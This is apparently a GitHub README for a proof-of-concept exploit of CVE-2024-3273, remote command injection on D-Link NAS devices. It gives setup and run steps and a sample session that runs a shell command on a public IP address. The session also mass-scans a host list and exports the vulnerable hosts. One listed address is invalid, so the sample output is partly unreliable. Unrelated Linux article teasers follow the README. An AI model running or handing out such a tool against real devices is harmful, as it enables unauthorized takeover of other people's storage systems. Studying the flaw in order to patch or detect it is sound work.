This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.
The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi
endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
requests
librarygit clone https://github.com/adhikara13/CVE-2024-3273.git
2. Navigate to the repository directory:
cd CVE-2024-3273
3. Run the PoC:
python main.py
4. Follow the on-screen instructions to choose the target device:
host:port
, and choose whether to export vulnerable hosts to vulnerables.txt
.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…
While file extensions in Linux are optional and often misleading, the file command helps decode what a…
The touch command is one of the quickest ways to create new empty files or update timestamps…
Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…
Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…
Creating directories is one of the earliest skills you'll use on a Linux system. The mkdir (make…